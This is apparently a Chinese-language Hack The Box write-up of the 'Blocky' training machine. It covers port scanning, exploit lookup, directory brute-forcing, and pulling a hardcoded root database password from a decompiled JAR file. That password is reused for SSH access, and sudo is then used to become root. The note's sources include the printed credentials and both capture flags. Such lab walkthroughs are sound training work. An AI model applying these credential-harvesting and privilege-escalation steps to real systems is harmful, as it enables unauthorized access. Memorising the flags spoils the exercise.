目录
连接至HTB服务器并启动靶机
使用nmap对靶机进行端口扫描
再次使用nmap对靶机开放端口进行脚本、服务信息扫描
对FTP服务版本:ProFTPD_1.3.5进行漏洞扫描
对SSH服务版本:OpenSSH 7.2p2进行漏洞扫描
使用浏览器访问靶机80端口
使用浏览器访问URL:http://blocky.htb/plugins
通过获取到的凭证登录到phpMyAdmin
USER_FLAG:ae2e8f6446440ddf3c42aa4653c9fb5b
权限提升
ROOT_FLAG:dad0c0993274a6ddce75361278ba3f4c
连接至HTB服务器并启动靶机
靶机IP:10.10.10.37
分配IP:10.10.16.22
使用nmap对靶机进行端口扫描
nmap -p- --min-rate=1500 -T4 -sS -sU -Pn 10.10.10.37
靶机开放端口:21、22、80、25565。均为TCP端口
再次使用nmap对靶机开放端口进行脚本、服务信息扫描
nmap -p21,22,80,25565 -sCV 10.10.10.37
从扫描结果可见靶机应该是Ubuntu_Linux系统,对各服务版本进行漏洞扫描
对FTP服务版本:ProFTPD_1.3.5进行漏洞扫描
searchsploit ProFTPD 1.3.5
可以看到基本是什么文件复制洞,尝试匿名登录一下靶机FTP服务器
ftp 10.10.10.37┌──(root㉿kali)-[/home/kali/Desktop]
└─# ftp 10.10.10.37
Connected to 10.10.10.37.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]
Name (10.10.10.37:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
对SSH服务版本:OpenSSH 7.2p2进行漏洞扫描
searchsploit OpenSSH 7.2p2
SSH服务这边只有用户名枚举漏洞,对我来说也没啥用
使用浏览器访问靶机80端口
直接访问会显示链接已被重置,所以我们将IP和域名写入hosts文件使DNS本地解析
echo '10.10.10.37 blocky.htb' >> /etc/hosts接着使用dirbuster、dirsearch、ffuf、wfuzz等工具对靶机路径进行爆破
ffuf -u http://blocky.htb/FUZZ -w ../dictionary/common.txt
这里不知道什么原因,用ffuf爆破出来的目录响应码和真实响应码不一致
使用浏览器访问URL:http://blocky.htb/plugins
直接点击BlockyCore.jar文件将其下载到本地
使用JD-GUI打开该文件
用户:root
密码:8YsqfCTnvxAUeduzjNSXe22
通过获取到的凭证登录到phpMyAdmin
在左侧数据库栏目中选择:wordpress->wp_users。可以找到用户notch,以及哈希密码
可以确定该用户就是数据库管理者,尝试通过SSH服务同密码登录
查找user_flag位置
find / -name 'user.txt' 2>/dev/null/home/notch/user.txt
/usr/share/doc/phpmyadmin/html/_sources/user.txt
查看user_flag内容
notch@Blocky:~$ cat /usr/share/doc/phpmyadmin/html/_sources/user.txt
User Guide
==========.. toctree::
:maxdepth: 2transformations
privileges
other
import_export
notch@Blocky:~$ cat /home/notch/user.txt
ae2e8f6446440ddf3c42aa4653c9fb5b
USER_FLAG:ae2e8f6446440ddf3c42aa4653c9fb5b
权限提升
查看当前用户可特权运行的文件
sudo -lnotch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser notch may run the following commands on Blocky:
(ALL : ALL) ALL
发现所有文件都可以特权运行,那就直接将shell切换到root用户即可
sudo su root查找root_flag位置
find / -name 'root.txt'notch@Blocky:~$ sudo su root
root@Blocky:/home/notch# pwd
/home/notch
root@Blocky:/home/notch# find / -name 'root.txt'
/root/root.txt
查看root_flag内容
cat /root/root.txtroot@Blocky:/home/notch# cat /root/root.txt
dad0c0993274a6ddce75361278ba3f4c
